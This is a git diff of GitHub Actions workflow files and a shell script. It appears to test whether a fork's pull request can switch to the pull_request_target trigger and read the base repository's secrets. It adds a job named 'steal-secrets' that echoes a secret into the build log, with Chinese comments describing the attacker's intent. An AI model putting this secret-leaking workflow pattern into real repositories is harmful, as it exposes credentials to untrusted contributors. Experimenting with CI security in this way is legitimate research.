dd

.github/workflows/test-fork-pr.yml

@@ -18,7 +18,7 @@ jobs:
     steps:
       - name: 打印 GitHub 运行上下文
         run: |
-          echo "工作流名称：${{ github.workflow }}"
+          echo "工作流名称：${{ github.workflow }} 11111111111111111"
           echo "事件类型：${{ github.event_name }}"
           echo "PR 来源仓库：${{ github.event.pull_request.head.repo.full_name }}"
           echo "PR 来源分支：${{ github.event.pull_request.head.ref }}"

.github/workflows/test-pr.yml

@@ -1,16 +1,20 @@
-name: Test PR Behavior
+name: Malicious PR Target Workflow (from Fork)
 
+# 关键修改：攻击者在自己的fork中，将触发器改成了 pull_request_target
+# 他的意图是，希望Base Repo在处理PR时，能执行这个文件，并因此使用这个危险的触发器
 on:
-  pull_request:
+  pull_request_target:
+    types: [opened, synchronize]
 
 jobs:
-  test-pr:
+  steal-secrets:
     runs-on: ubuntu-latest
     steps:
-      - name: Checkout Code
-        uses: actions/checkout@v2
-
-      - name: Run script
+      - name: Attempt to access secret from fork's YML
         run: |
-          chmod +x ./run.sh
-          ./run.sh
+          echo "😈 This malicious step is defined in the FORK's workflow file."
+          echo "It is trying to use 'pull_request_target' to gain access to secrets."
+          echo "Attempting to exfiltrate secret..."
+          # 直接尝试将secret打印到日志中，这是最简单的攻击
+          # 如果这个workflow真的被执行，并且能访问secret，这行就会泄密
+          echo "The secret is: ${{ secrets.MY_SUPER_SECRET }}"

run.sh

@@ -1,2 +1,3 @@
 #!/bin/bash
-echo "🚨 This is a MALICIOUS script from FORK repo!"
+echo "🚨 This is a MALICIOUS script from FORK repo! 111111111111111"
+echo "123456785trdascvfdghjytut5refwdgrghuk"